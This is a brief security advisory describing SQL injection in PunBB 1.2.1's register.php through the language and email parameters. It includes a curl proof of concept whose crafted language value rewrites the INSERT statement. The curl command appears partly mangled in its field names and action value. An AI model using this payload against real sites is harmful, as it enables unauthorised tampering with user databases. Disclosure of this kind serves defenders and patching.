=================================================
   SQL Injections in punbb-1.2.1 register.php
=================================================

 Description
 -----------

A remote attacker can cause register.php to execute
arbitrary SQL statements by supplying malicous
values to the language or email parameter.

The email paramter is guarded by the function
is_valid_email but this function doesn't do any
real filtering and will pass any SQL statement
that is formatted correctly.

This also affects systems using the magic_quotes_gpc
option in php.ini.

 Proof of concept
 ----------------

This example only demonstrates the vulnerability in
the language paramter.

curl --form form_sent=1 --form req_username=sha --form req_password1=passwd --form req_paspasswd --form req_email1=sha@punbb.com --form language="English', 'Oxygen', 0, '0.0.0.0', 0) -- " http://target/register.php?action=registerer

Will create a user with the language English, style
Oxygen and ip 0.0.0.0.